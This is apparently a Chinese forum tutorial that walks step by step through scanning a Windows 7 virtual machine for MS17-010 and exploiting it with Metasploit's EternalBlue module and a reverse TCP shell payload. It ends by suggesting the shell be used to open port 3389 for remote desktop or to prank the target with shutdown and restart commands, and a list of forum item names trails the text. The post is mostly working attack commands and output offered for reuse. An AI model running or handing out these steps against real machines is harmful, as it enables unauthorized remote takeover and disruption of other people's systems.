|
0x01
首先我们需要和目标在同一网段下
Windows查看本机IP方法:
Win+R输入cmd,回车后会打开cmd命令框输入ipconfig(这个命令人人皆知)
发现目标的ip是192.168.33.0这个网段下
接着打开Kali Linux
在终端输入ifconfig这个命令查看自己的ip
发现是同一网段下
我们现在做的是白盒测试,知道目标机器的IP
如果在未知目标IP的情况下,需要用到Nmap这个工具
扫描存活主机:
- nmap -sS -O 192.168.33.0/24
我们这里就不浪费时间做演示了
在kali终端输入
现在我们需要验证目标是否有漏洞
- use auxiliary/scanner/smb/smb_ms17_010
查看选项是否补齐
发现RHOSTS这个选项没有补齐
(rhosts是目标主机)
- set rhosts 192.168.33.232
然后输入run
Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
目标看起来易受到攻击,Windows7版本
绿色的框子是手敲命令行
红色的是我们要使用的exploit
黄色的是提示:没有payload - 使用exploit:use exploit/windows/smb/ms17_010_eternalblue
完成后,需要选择你的目标系统 然后在下面设置目标编号 接下来我们需要寻找一个payload来稳定我们与目标之间的连接 否则非常容易断开连接 payload:载荷攻击 - search windows/x64/shell type:payload
- set payload windows/x64/shell/reverse_tcp
选择好payload之后,查看一下选项是否补齐 未补齐,直接输入命令补齐 - set rhosts 192.168.33.232
rhosts:目标主机 lhost:你的主机
最振奋人心的一步来了 exploit利用漏洞 稍等片刻,即可弹出shell 如果长时间没反应,可以手动输入shell 有可能会出现乱码 这是因为Windows和Linux的编码不一样导致的 可以自行设置 在shell里面输入创建文件夹命令,指定桌面路径 - md C:\Users\Administrator\Desktop
- md就是mkdir的缩写
现在打开虚拟机 发现已经多出来一个文件夹了 更多命令要你们自己来摸索 给个思路:用shell开启3389端口,再远程链接桌面 或者使用关机&重启的命令恶搞 | 
窥视卡
雷达卡
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
